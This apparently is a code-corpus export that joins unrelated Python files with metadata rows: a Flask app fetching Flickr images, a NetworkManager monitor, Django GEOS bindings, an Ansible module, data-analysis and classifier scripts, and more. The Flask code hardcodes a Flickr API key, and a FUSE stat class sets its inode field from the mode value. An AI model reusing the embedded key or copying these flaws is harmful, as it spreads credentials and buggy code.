def get_flickrpicURL(term):
api_key = 'b60ce2a4db0b09dc4e9e895efe6d660e'
URL = 'https://api.flickr.com/services/rest/?method=flickr.photos.search&' + \
'api_key=' + api_key + \
'&tags=' + term.replace(" ", "+") + \
'&privacy_filter=1&format=json&nojsoncallback=1'
try:
response = urlopen(URL)
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s picURL")
return "https://farm{0}.staticflickr.com/{1}/{2}_{3}_z.jpg".format( \
j['photos']['photo'][0]['farm'], \
j['photos']['photo'][0]['server'], \
j['photos']['photo'][0]['id'], \
j['photos']['photo'][0]['secret'])
except:
return "assets/img/888888.png"
@app.route("/dream/picURLthn/<term>")
def get_flickrpicURLthn(term):
api_key = 'b60ce2a4db0b09dc4e9e895efe6d660e'
URL = 'http://api.flickr.com/services/rest/?method=flickr.photos.search&' + \
'api_key=' + api_key + \
'&tags=' + term.replace(" ", "+") + \
'&privacy_filter=1&format=json&nojsoncallback=1'
try:
response = urlopen(URL)
html = response.read()
j = json.loads(html)
print("Refreshed " + term + "'s picURLthn")
return "http://farm{0}.staticflickr.com/{1}/{2}_{3}_q.jpg".format( \
j['photos']['photo'][0]['farm'], \
j['photos']['photo'][0]['server'], \
j['photos']['photo'][0]['id'], \
j['photos']['photo'][0]['secret'])
except:
return "assets/img/888888thn.png"
@app.route("/dreams/add/<dream>")
def add_dream(dream):
d, created = Dream.get_or_create(name=unquote(dream.lower()))
d.count += 1;
# if the record has just been created, fetch the picURL and definition
if created:
print("Creating new dream")
d.created_on = datetime.datetime.now()
d.modified_on = datetime.datetime.now()
d.picURL = get_flickrpicURL(d.name)
d.picURLthn = get_flickrpicURLthn(d.name)
d.definition = get_urbandictionary(d.name)
else:
print("Fetching existing dream")
# if the definition and URL are more than EXTERNAL_RESOURCE_REFRESH_FREQ days old
days_old = 0
try:
days_old = (d.modified_on - d.created_on).days
except:
days_old = 0
if days_old >= EXTERNAL_RESOURCE_REFRESH_FREQ:
d.picURL = get_flickrpicURL(d.name)
d.picURLthn = get_flickrpicURLthn(d.name)
d.definition = get_urbandictionary(d.name)
d.modified_on = datetime.datetime.now()
d.save()
return jsonify(data={'id': d.id,
'count': d.count})
@app.route("/dreams/top")
def top_dreams():
a = get_dreams(Dream.count.desc(), MAX_TOP_DREAMS)
#Response.headers.add('Access-Control-Allow-Origin', '*')
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#return jsonify(data=get_dreams(Dream.count.desc(), MAX_TOP_DREAMS))
@app.route("/dreams/recent")
def recent_dreams():
a = get_dreams(Dream.modified_on.desc(), MAX_TOP_DREAMS)
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#return jsonify(data=get_dreams(Dream.modified_on.desc(), MAX_TOP_DREAMS))
@app.route("/dreams/get/<dream>")
def get_single_dream(dream):
a = get_dream(unquote(dream.lower()))
return Response(json.dumps(a), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
#-------------------------------------------------------------------------------
# Main
#-------------------------------------------------------------------------------
if __name__ == "__main__":
# Development only! Reloads server on file change.
init_db()
app.debug = True
app.run()
|
apache-2.0
| 3,691,948,276,489,078,300
| 33.8125
| 159
| 0.529473
| false
| 3.597417
| false
| false
| false
|
gonicus/gosa
|
common/src/gosa/common/network.py
|
1
|
3494
|
# This file is part of the GOsa framework.
#
# http://gosa-project.org
#
# Copyright:
# (C) 2016 GONICUS GmbH, Germany, http://www.gonicus.de
#
# See the LICENSE file in the project's top-level directory for details.
import dbus
from gosa.common.components.dbus_runner import DBusRunner
from logging import getLogger
NM_STATE_UNKNOWN = 0
NM_STATE_ASLEEP = 10
NM_STATE_DISCONNECTED = 20
NM_STATE_DISCONNECTING = 30
NM_STATE_CONNECTING = 40
NM_STATE_CONNECTED_LOCAL = 50
NM_STATE_CONNECTED_SITE = 60
NM_STATE_CONNECTED_GLOBAL = 70
class Monitor(object):
def __init__(self, callback=None):
self.__callback = callback
self.log = getLogger(__name__)
self.__running = False
self.__thread = None
self.log.info("Initializing network state monitor")
# Initialize DBUS
dr = DBusRunner.get_instance()
self.__bus = dr.get_system_bus()
# Register actions to detect the network state
self.__upower_actions()
self.__network_actions()
# Get current state
try:
proxy = self.__bus.get_object('org.freedesktop.NetworkManager', '/org/freedesktop/NetworkManager')
iface = dbus.Interface(proxy, 'org.freedesktop.DBus.Properties')
version = str(iface.Get("org.freedesktop.NetworkManager", "Version"))
if tuple(version.split(".")) < ("0", "9"):
self.log.warning("network-manager is too old: defaulting to state 'online'")
self.__state = True
else:
# Register actions to detect the network state
self.__upower_actions()
self.__network_actions()
self.__state = iface.Get("org.freedesktop.NetworkManager", "State") in [NM_STATE_CONNECTED_SITE, NM_STATE_CONNECTED_GLOBAL]
except:
self.log.warning("no network-manager detected: defaulting to state 'online'")
self.__state = True
def is_online(self):
return self.__state
def __upower_actions(self):
try:
proxy = self.__bus.get_object('org.freedesktop.UPower', '/org/freedesktop/UPower')
iface = dbus.Interface(proxy, 'org.freedesktop.UPower')
iface.connect_to_signal("Sleeping", self.__upower_sleeping)
except:
self.log.warning("no UPower detected: will not be able to suspend network")
def __network_actions(self):
try:
proxy = self.__bus.get_object('org.freedesktop.NetworkManager', '/org/freedesktop/NetworkManager')
iface = dbus.Interface(proxy, 'org.freedesktop.NetworkManager')
iface.connect_to_signal("StateChanged", self.__network_state)
except:
self.log.warning("no network-manager detected: will not be able to suspend or activate network")
def __upower_sleeping(self):
self.log.info("network down")
self.__state = False
if self.__callback:
self.__callback(False)
def __network_state(self, state):
if state in [NM_STATE_CONNECTED_SITE, NM_STATE_CONNECTED_GLOBAL]:
if self.__state is False:
self.log.info("network up")
self.__state = True
if self.__callback:
self.__callback(True)
elif self.__state is True:
self.log.info("network down")
self.__state = False
if self.__callback:
self.__callback(False)
|
lgpl-2.1
| -8,663,401,339,332,908,000
| 31.962264
| 139
| 0.603892
| false
| 3.997712
| false
| false
| false
|
yephper/django
|
django/contrib/gis/geos/prototypes/predicates.py
|
1
|
1630
|
"""
This module houses the GEOS ctypes prototype functions for the
unary and binary predicate operations on geometries.
"""
from ctypes import c_char, c_char_p, c_double
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
# ## Binary & unary predicate factories ##
class UnaryPredicate(GEOSFuncFactory):
"For GEOS unary predicate functions."
argtypes = [GEOM_PTR]
restype = c_char
errcheck = staticmethod(check_predicate)
class BinaryPredicate(UnaryPredicate):
"For GEOS binary predicate functions."
argtypes = [GEOM_PTR, GEOM_PTR]
# ## Unary Predicates ##
geos_hasz = UnaryPredicate('GEOSHasZ')
geos_isclosed = UnaryPredicate('GEOSisClosed')
geos_isempty = UnaryPredicate('GEOSisEmpty')
geos_isring = UnaryPredicate('GEOSisRing')
geos_issimple = UnaryPredicate('GEOSisSimple')
geos_isvalid = UnaryPredicate('GEOSisValid')
# ## Binary Predicates ##
geos_contains = BinaryPredicate('GEOSContains')
geos_covers = BinaryPredicate('GEOSCovers')
geos_crosses = BinaryPredicate('GEOSCrosses')
geos_disjoint = BinaryPredicate('GEOSDisjoint')
geos_equals = BinaryPredicate('GEOSEquals')
geos_equalsexact = BinaryPredicate('GEOSEqualsExact', argtypes=[GEOM_PTR, GEOM_PTR, c_double])
geos_intersects = BinaryPredicate('GEOSIntersects')
geos_overlaps = BinaryPredicate('GEOSOverlaps')
geos_relatepattern = BinaryPredicate('GEOSRelatePattern', argtypes=[GEOM_PTR, GEOM_PTR, c_char_p])
geos_touches = BinaryPredicate('GEOSTouches')
geos_within = BinaryPredicate('GEOSWithin')
|
bsd-3-clause
| -4,548,278,871,508,046,000
| 35.906977
| 98
| 0.752761
| false
| 3.551198
| false
| false
| false
|
DavidWhittingham/agsadmin
|
agsadmin/sharing_admin/community/groups/Group.py
|
1
|
1457
|
from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str,
super, zip)
from ...._utils import send_session_request
from ..._PortalEndpointBase import PortalEndpointBase
from .CreateUpdateGroupParams import CreateUpdateGroupParams
class Group(PortalEndpointBase):
@property
def id(self):
return self._pdata["id"]
@property
def _url_full(self):
return "{0}/{1}".format(self._url_base, self.id)
def __init__(self, requests_session, url_base, id):
super().__init__(requests_session, url_base)
self._pdata = {"id": id}
def get_properties(self):
"""
Gets the properties of the item.
"""
return self._get()
def update(self, update_group_params, clear_empty_fields=False):
"""
Updates the group properties.
"""
update_group_params = update_group_params._get_params() if isinstance(
update_group_params, CreateUpdateGroupParams) else update_group_params.copy()
if not "clearEmptyFields" in update_group_params:
update_group_params["clearEmptyFields"] = clear_empty_fields
r = self._create_operation_request(self, "update", method="POST", data=update_group_params)
return send_session_request(self._session, r).json()
|
bsd-3-clause
| 7,639,082,891,741,181,000
| 32.906977
| 117
| 0.643102
| false
| 3.937838
| false
| false
| false
|
segfaulthunter/asynchia
|
benchmark/ee_parse.py
|
1
|
2223
|
# -*- coding: us-ascii -*-
# asynchia - asynchronous networking library
# Copyright (C) 2009 Florian Mayer <florian.mayer@bitsrc.org>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import time
import operator
import itertools
import asynchia.ee
import asynchia.maps
import asynchia.util
import benchutil
class SendAllTransport(asynchia.SendallTrait, asynchia.SocketTransport):
pass
def mock_handler(mp, inbuf):
a, b = asynchia.util.socketpair()
sender = SendAllTransport(mp, a)
sender.sendall(inbuf)
recvr = asynchia.SocketTransport(mp, b)
return recvr
class ParseEE(benchutil.AsyncBenchmark):
def __init__(self, mp, size):
self.trnsp = mock_handler(mp, os.urandom(size))
sub = itertools.repeat(range(250, 20000))
chunks = []
x = size
while x > 0:
chunks.append(min(x, sub.next()))
x -= chunks[-1]
self.ptcl = reduce(
operator.add,
map(asynchia.ee.DelimitedStringCollector, chunks)
)
self.ptcl.onclose = lambda _: self.submit_async(time.time())
def run(self):
hndl = asynchia.ee.Handler(self.trnsp, self.ptcl)
def done(_):
raise asynchia.SocketMapClosedError
if __name__ == '__main__':
if len(sys.argv) >= 3:
sample = int(sys.argv[1])
len_ = int(sys.argv[2])
else:
sample = 50
len_ = 5000000
mp = asynchia.maps.DefaultSocketMap()
run = benchutil.Runner([ParseEE(mp, len_) for _ in xrange(sample)], done)
run.start()
mp.run()
print run.result
|
gpl-3.0
| -3,150,133,316,793,390,600
| 26.7875
| 77
| 0.662618
| false
| 3.5625
| false
| false
| false
|
mrosenstihl/PulsePrograms
|
autoPFGStimulatedEcho_const_T1/analyse.py
|
1
|
2319
|
import re, os,sys
import numpy as N
from tables import *
import scipy.odr
import pylab as P
conv = 6.36e-5
gamma = 2.67522e8
start = 50
stop = 250
def diffusion(p,x):
sig = N.exp(-p[0]*x)+p[1]
return sig
hdf = openFile(sys.argv[1])
temperature_runs = [run for run in hdf.root.data_pool if run._v_name.startswith('dir_')]
results = {}
for temperature in temperature_runs:
tbvt = temperature._v_name
print tbvt
for run in hdf.walkNodes(temperature):
print run._v_name
if run._v_name.startswith('dict_grad'):
dwell = run.indices.col('dwelltime')
delta = float(run._v_attrs.description_delta)
tau = float(run._v_attrs.description_tau)
tm = float(run._v_attrs.description_tm)
dac = float(run._v_attrs.description_dac)
# b Faktor
bfac = (gamma*dac*delta*conv)**2*( (tau+tm) / 4 + delta/12. + 5.*delta/16./N.pi**2)
real,imag = run.accu_data[:,0],run.accu_data[:,2]
mag = N.sqrt(real**2 + imag**2)
# Signalamplitude
sig = mag[start:stop].mean()-mag[-1024:].mean()
sig_err= mag[-1024:].std()/N.sqrt((stop-start))
try:
results[tbvt].append([bfac,sig,sig_err,delta,tau,tm,dac])
except:
results[tbvt] = []
results[tbvt].append([bfac,sig,sig_err,delta,tau,tm,dac])
results[tbvt] = N.array(results[tbvt])
x = results[tbvt][:,0]
y = results[tbvt][:,1]
y_err = results[tbvt][:,2]
delta = results[tbvt][:,3]
tau = results[tbvt][:,4]
tm = results[tbvt][:,5]
dac = results[tbvt][:,6]
# Create sets
deltas = set(delta)
taus = set(tau)
tms = set(tm)
P.subplot(211)
# Select the single measurements sets (same tau,tm,delta) and normalize them to g==0
mask = [y>5e-2]
for de in deltas:
for ta in taus:
for t in tms:
ind_de = delta==de
ind_ta = tau==ta
ind_t = tm==t
ind_dac0 = dac==0
# This is a set
ind = ind_de*ind_ta*ind_t
ind_norm = ind_de*ind_ta*ind_t*ind_dac0
y_err[ind] /= y[ind_norm]
y[ind] /= y[ind_norm]
x_err = x*0.05
#assume 5% error from calibration
data = scipy.odr.Data(x=x[mask],y=y[mask],wd=y_err[mask])
model = scipy.odr.Model(diffusion)
odr = scipy.odr.ODR(data,model,beta0=[2e-13,0.1], ifixx=(1,))
odr.run()
print "ODR Result"
odr.output.pprint()
print "Polyfit"
print N.polyfit(x[y>5e-2],N.log(y[y>5e-2]),1)
P.semilogy(x[mask],y[mask],'o')
P.show()
|
bsd-2-clause
| -8,492,228,953,505,733,000
| 24.483516
| 88
| 0.626994
| false
| 2.373593
| false
| false
| false
|
emrecimen/CIOL-ICF
|
ICF_Training_Test.py
|
1
|
8182
|
# This file is the implementation of the algorithm 1 and includes the main function
# One can use this file if the training and test files are separated.
# Inputs can be tuned in the corresponding area
# The accuracy rates and all function parameters are printed to the console as output
# Dataset can be in csv or arff file.
# If there are n classes; class labels should be integers 1 to n in the last column
import numpy as np
from gurobipy import *
import math
import csv
import arff
import time
import ICF_Purity
# Calculating separation function.Step 2 of Algorithm 1.
def PCFl2( Ajr, Bjr, cjr, purity):
distb =np.sqrt(np.power(Bjr-cjr,2).sum(axis=1))
dista =np.sqrt(np.power(Ajr-cjr,2).sum(axis=1))
gamma=(np.max(dista)+np.min(distb))/2.0
return { 'gamma': gamma, 'c':cjr, 'purity':purity}
# Solving P_r. LP model in Step 2 of Algorithm 1.
def PCF(Ajr, Bjr, cjr,status, purity):
# Create optimization model
m = Model('PCF')
# Create variables
gamma = m.addVar(vtype=GRB.CONTINUOUS, lb=1, name='gamma')
w = range(nn)
for a in range(nn):
w[a] = m.addVar(vtype=GRB.CONTINUOUS, name='w[%s]' % a)
ksi = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='ksi')
m.update()
hataA = {}
hataB = {}
for i in range(len(Ajr)):
hataA[i] = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='hataA[%s]' % i)
m.update()
m.addConstr(quicksum((Ajr[i][j] - cjr[j]) * w[j] for j in range(len(cjr))) + (ksi * quicksum(math.fabs(Ajr[i][j] - cjr[j]) for j in range(len(cjr)))) - gamma + 1.0 <= hataA[i])
for z in range(len(Bjr)):
hataB[z] = m.addVar(vtype=GRB.CONTINUOUS, lb=0, name='hataB[%s]' % z)
m.update()
m.addConstr(quicksum((Bjr[z][r] - cjr[r]) * -w[r] for r in range(len(cjr))) - (ksi * quicksum(math.fabs(Bjr[z][q] - cjr[q]) for q in range(len(cjr)))) + gamma + 1.0 <= hataB[z])
m.update()
m.setObjective((quicksum(hataA[k] for k in range(len(hataA))) / len(hataA))+(quicksum(hataB[l] for l in range(len(hataB))) / len(hataB)), GRB.MINIMIZE)
m.update()
# Compute optimal solution
m.optimize()
m.write('model.sol')
status.append(m.Status)
ww=[]
for i in range(len(cjr)):
ww.append(w[i].X)
return {'s':status,'w': ww, 'gamma': gamma.x, 'ksi': ksi.x, 'c':cjr, 'purity':purity}
def findgj(Aj, centroids, B,status, Rs, Rbs, purity):
gj=[]
r=0
for Ajr in Aj:
if purity[r]<tolpr:
newAjr, newB= ICF_Purity.eliminateWithR(Ajr, B, centroids[r], Rs[r], Rbs[r])
sonuc = PCF(newAjr, newB, centroids[r],status, purity[r])
status=sonuc['s']
gj.append(sonuc)
else:
newAjr, newB= ICF_Purity.eliminateWithR(Ajr, B, centroids[r], Rs[r], Rbs[r])
sonuc = PCFl2(newAjr, newB, centroids[r], purity[r])
gj.append(sonuc)
r=r+1
return status,gj
def pcfDeger(w, ksi, gamma, c, x):
deger = np.dot(w,x-c) + ksi*np.sum(abs(x-c)) -gamma
return deger
def pcfl2Deger(gamma,c, x):
deger =np.sqrt(np.sum(np.square(x-c))) - gamma
return deger
def sinifBul(data):
sinifTahmini=[]
g_deger=[]
for d in data:
t=1
enkDeger=float('inf')
gj_deger=[]
for gj in g:
gjr_deger=[]
for gjr in gj:
if gjr['purity']>tolpr:
fonkDeger= pcfl2Deger(gjr['gamma'],gjr['c'],d[0:-1])
else:
fonkDeger = pcfDeger(gjr['w'],gjr['ksi'],gjr['gamma'],gjr['c'],d[0:-1])
gjr_deger.append(fonkDeger)
if (fonkDeger<enkDeger):
enkDeger=fonkDeger
sinifT=t
t=t+1
gj_deger.append(gjr_deger)
g_deger.append(gj_deger)
sinifTahmini.append(sinifT)
return sinifTahmini
def egitimOraniniHesapla(gj, sinifEtiket, dataTrain):
dogruSayisiA=0.0
dogruSayisiB=0.0
say=0.0
for d in dataTrain:
enkDeger=float('inf')
for gjr in gj:
fonkDeger = pcfDeger(gjr['w'],gjr['ksi'],gjr['gamma'],gjr['c'],d[0:-1])
if (fonkDeger<enkDeger):
enkDeger=fonkDeger
if (enkDeger<0):
if d[-1]==sinifEtiket:
dogruSayisiA=dogruSayisiA+1
else:
say+=1
else:
if d[-1]!=sinifEtiket:
dogruSayisiB=dogruSayisiB+1
say+=1
egitimOrani=(float(dogruSayisiA)+float(dogruSayisiB))/len(dataTrain)
return egitimOrani
# Read arff file
def arffOku(dosya):
d = arff.load(open(dosya, 'rb'))
v=[]
for dd in d['data']:
satir=[]
for ddd in dd:
satir.append(float(ddd))
v.append(satir)
v=np.array(v)
return v
# Read csv file
def readData(dosya):
dosya = open(dosya)
okuyucu = csv.reader(dosya, quotechar=',')
data = []
for row in okuyucu:
satirVeri = []
for deger in row:
satirVeri.append(float(deger))
data.append(satirVeri)
data=np.array(data)
return data
###################### MAIN FUNCTION STARTS HERE ###############################
start_time = time.time()
###################### INPUTS ###############################
dataTrain = readData('/Users/exampleTrain.csv') #Dataset paths should be given here.
dataTest = readData('/Users/exampleTest.csv')
#dataTrain = arffOku('exampleTrain.arff')
tolpr=0.90 #epsilon 1 in algorithm 1
#epsilon 1 in algorithm 1 This parameter is a threshold to decide whether an LP is necessary, or not, in the ICF algorithm.
# High values for this parameter increases the chance of calling the LP for PCF construction, while its low values favor for algebraic cone construction
# (corresponding to a faster, but possibly lower resolution result).
######################
# mm=len(data) # row size
nn=len(dataTrain[0])-1 # feature size
sinifSayisi = int(np.max(dataTrain[:,-1])) # classes must be 1 to n in the last column ...................................
status = []
g=[]
for sinif in range(1,sinifSayisi+1):
Aj = []
Bj = []
for d in dataTrain:
if d[-1] == sinif:
Aj.append(d[ 0:-1])
else:
Bj.append(d[ 0:-1])
Aj=np.array(Aj)
Bj=np.array(Bj)
centroids, clusters, resR, resRB, purities = ICF_Purity.getPureClusters(Aj, Bj) # Call algorithm 2 here
status,gj=findgj(clusters, centroids, Bj,status,resR, resRB, purities ) # Calling Algorithm 1, Step 1-2
g.append(gj)
#--------------------------------TESTING---------------------------------------------------- '''
sinifTahminiTrain=sinifBul(dataTrain)
gercekSinifTrain=dataTrain[:,-1]
sinifTahminiTest=sinifBul(dataTest)
gercekSinifTest=dataTest[:,-1]
#Calculating training accuracy
EgitimDogrulukOrani= round(100.0*(np.sum((sinifTahminiTrain==gercekSinifTrain)))/len(dataTrain),2)
#Calculating test accuracy
TestDogrulukOrani= round(100.0*(np.sum((sinifTahminiTest==gercekSinifTest) ))/len(dataTest),2)
print "########################################################"
j=1
for gj in g:
r=1
print "For class ", j,"the classifiers are:"
for gjr in gj:
if gjr['purity'] < tolpr:
print j ,".class ", r ,".cluster classification function that separates A from B: gjr = w.(x-c) + ksi*|w.(x-c)|-gamma "
print "w =", gjr['w']
print "ksi =", gjr['ksi']
print "gamma =", gjr['gamma']
print "center =", gjr['c']
else:
print j,".class ", r, ".cluster classification function that separates A from B: gjr = |x-c|_2 - gamma "
print "gamma =", gjr['gamma']
print "center =", gjr['c']
print "-----------------------------------------------------------"
r=r+1
j=j+1
print "##################################################################"
print "Training Accuracy : %", EgitimDogrulukOrani
print "Test Accuracy : % ", TestDogrulukOrani
print "##################################################################"
print("--- %s seconds elapsed ---" % (time.time() - start_time))
|
mit
| -6,865,739,474,599,376,000
| 26.641892
| 185
| 0.558788
| false
| 2.923187
| true
| false
| false
|
jesseklein406/django-imager
|
imagersite/imager_images/migrations/0004_auto_20150728_1555.py
|
1
|
1063
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('imager_images', '0003_auto_20150726_1224'),
]
operations = [
migrations.AlterField(
model_name='album',
name='date_published',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='album',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='photo',
name='date_published',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='photo',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='photo',
name='title',
field=models.CharField(max_length=256, blank=True),
),
]
|
mit
| -1,288,981,641,645,240,300
| 26.25641
| 63
| 0.543744
| false
| 4.504237
| false
| false
| false
|
dchirikov/luna
|
contrib/ansible/modules/clustering/luna_bmcsetup.py
|
1
|
2793
|
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
try:
import luna
except ImportError:
raise AnsibleError("luna is not installed")
from luna_ansible.helpers import StreamStringLogger
import logging
if luna.__version__ != '1.2':
raise AnsibleError("Only luna-1.2 is supported")
def luna_bmcsetup_present(data):
data.pop('state')
name = data.pop('name')
changed = False
ret = True
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
args = {}
for key in data:
if data[key] is not None:
args[key] = data[key]
args['name']=name
args['create']=True
bmcsetup = luna.BMCSetup(**args)
changed = True
for key in data:
if data[key] is not None and bmcsetup.get(key) != data[key]:
changed = True
ret &= bmcsetup.set(key, data[key])
return not ret, changed, str(bmcsetup)
def luna_bmcsetup_absent(data):
name = data['name']
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
return False, False, name
res = bmcsetup.delete()
return not res, res, name
def main():
log_string = StreamStringLogger()
loghandler = logging.StreamHandler(stream=log_string)
formatter = logging.Formatter('%(levelname)s: %(message)s')
logger = logging.getLogger()
loghandler.setFormatter(formatter)
logger.addHandler(loghandler)
module = AnsibleModule(
argument_spec={
'name': {
'type': 'str', 'required': True},
'user': {
'type': 'str', 'required': False},
'password': {
'type': 'str', 'default': None, 'required': False,
'no_log': True},
'mgmtchannel': {
'type': 'int', 'default': None, 'required': False},
'netchannel': {
'type': 'int', 'default': None, 'required': False},
'userid': {
'type': 'int', 'default': None, 'required': False},
'comment': {
'type': 'str', 'default': None, 'required': False},
'state': {
'type': 'str', 'default': 'present',
'choices': ['present', 'absent']}
}
)
choice_map = {
"present": luna_bmcsetup_present,
"absent": luna_bmcsetup_absent,
}
is_error, has_changed, result = choice_map.get(
module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, msg=str(log_string), meta=result)
else:
module.fail_json(changed=has_changed, msg=str(log_string), meta=result)
if __name__ == '__main__':
main()
|
gpl-3.0
| -39,312,346,139,698,100
| 26.653465
| 79
| 0.557465
| false
| 3.784553
| false
| false
| false
|
95subodh/Leetcode
|
376. Wiggle Subsequence.py
|
1
|
1580
|
#A sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.
#
#For example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.
#
#Given a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.
#
#Examples:
#Input: [1,7,4,9,2,5]
#Output: 6
#The entire sequence is a wiggle sequence.
#
#Input: [1,17,5,10,13,15,10,5,16,8]
#Output: 7
#There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].
#
#Input: [1,2,3,4,5,6,7,8,9]
#Output: 2
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length, direction = 1, None
for i in xrange(1, len(nums)):
if nums[i - 1] < nums[i] and (direction is None or direction is False):
length += 1
direction = True
elif nums[i - 1] > nums[i] and (direction is None or direction is True):
length += 1
direction = False
return length if len(nums)>1 else len(nums)
|
mit
| 877,606,916,788,035,800
| 46.909091
| 301
| 0.724684
| false
| 3.204868
| false
| false
| false
|
a4a881d4/fs45g
|
fs45g/fs45gstat.py
|
1
|
1031
|
import fuse
class fs45gStat(fuse.Stat):
def __init__(self):
self.st_mode = 0
self.st_ino = 0
self.st_dev = 0
self.st_nlink = 0
self.st_uid = 0
self.st_gid = 0
self.st_size = 0
self.st_atime = 0
self.st_mtime = 0
self.st_ctime = 0
class fs45gROStat(fs45gStat):
def __init__(self, clone, uid, gid):
super(fs45gStat,self).__setattr__('st_mode',clone.st_mode)
super(fs45gStat,self).__setattr__('st_ino',clone.st_mode)
super(fs45gStat,self).__setattr__('st_dev',clone.st_dev)
super(fs45gStat,self).__setattr__('st_nlink',clone.st_nlink)
super(fs45gStat,self).__setattr__('st_uid',uid)
super(fs45gStat,self).__setattr__('st_gid',gid)
super(fs45gStat,self).__setattr__('st_size',clone.st_size)
super(fs45gStat,self).__setattr__('st_atime',clone.st_atime)
super(fs45gStat,self).__setattr__('st_mtime',clone.st_mtime)
super(fs45gStat,self).__setattr__('st_ctime',clone.st_ctime)
def __setattr__(self, *args):
raise TypeError("can't modify immutable instance")
__delattr__ = __setattr__
|
apache-2.0
| -6,573,624,865,860,555,000
| 31.21875
| 63
| 0.659554
| false
| 2.58396
| false
| false
| false
|
dAck2cC2/m3e
|
build_legacy/tools/findleaves.py
|
1
|
3628
|
#!/usr/bin/env python
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Finds files with the specified name under a particular directory, stopping
# the search in a given subdirectory when the file is found.
#
import os
import sys
def perform_find(mindepth, prune, dirlist, filenames):
result = []
pruneleaves = set(map(lambda x: os.path.split(x)[1], prune))
seen = set()
for rootdir in dirlist:
rootdepth = rootdir.count("/")
for root, dirs, files in os.walk(rootdir, followlinks=True):
# prune
check_prune = False
for d in dirs:
if d in pruneleaves:
check_prune = True
break
if check_prune:
i = 0
while i < len(dirs):
if dirs[i] in prune:
del dirs[i]
else:
i += 1
# mindepth
if mindepth > 0:
depth = 1 + root.count("/") - rootdepth
if depth < mindepth:
continue
# match
for filename in filenames:
if filename in files:
result.append(os.path.join(root, filename))
del dirs[:]
# filter out inodes that have already been seen due to symlink loops
i = 0
while i < len(dirs):
st = os.stat(os.path.join(root, dirs[i]))
key = (st.st_dev, st.st_ino)
if key in seen:
del dirs[i]
else:
i += 1
seen.add(key)
return result
def usage():
sys.stderr.write("""Usage: %(progName)s [<options>] [--dir=<dir>] <filenames>
Options:
--mindepth=<mindepth>
Both behave in the same way as their find(1) equivalents.
--prune=<dirname>
Avoids returning results from inside any directory called <dirname>
(e.g., "*/out/*"). May be used multiple times.
--dir=<dir>
Add a directory to search. May be repeated multiple times. For backwards
compatibility, if no --dir argument is provided then all but the last entry
in <filenames> are treated as directories.
""" % {
"progName": os.path.split(sys.argv[0])[1],
})
sys.exit(1)
def main(argv):
mindepth = -1
prune = []
dirlist = []
i=1
while i<len(argv) and len(argv[i])>2 and argv[i][0:2] == "--":
arg = argv[i]
if arg.startswith("--mindepth="):
try:
mindepth = int(arg[len("--mindepth="):])
except ValueError:
usage()
elif arg.startswith("--prune="):
p = arg[len("--prune="):]
if len(p) == 0:
usage()
prune.append(p)
elif arg.startswith("--dir="):
d = arg[len("--dir="):]
if len(p) == 0:
usage()
dirlist.append(d)
else:
usage()
i += 1
if len(dirlist) == 0: # backwards compatibility
if len(argv)-i < 2: # need both <dirlist> and <filename>
usage()
dirlist = argv[i:-1]
filenames = [argv[-1]]
else:
if len(argv)-i < 1: # need <filename>
usage()
filenames = argv[i:]
results = list(set(perform_find(mindepth, prune, dirlist, filenames)))
results.sort()
for r in results:
print r
if __name__ == "__main__":
main(sys.argv)
|
apache-2.0
| 5,406,521,903,935,846,000
| 27.566929
| 82
| 0.595645
| false
| 3.617149
| false
| false
| false
|
NicovincX2/Python-3.5
|
Statistiques/Estimation (statistique)/Régression/bay_ridge_OLS.py
|
1
|
2049
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import BayesianRidge, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weigthts
np.random.seed(0)
n_samples, n_features = 100, 100
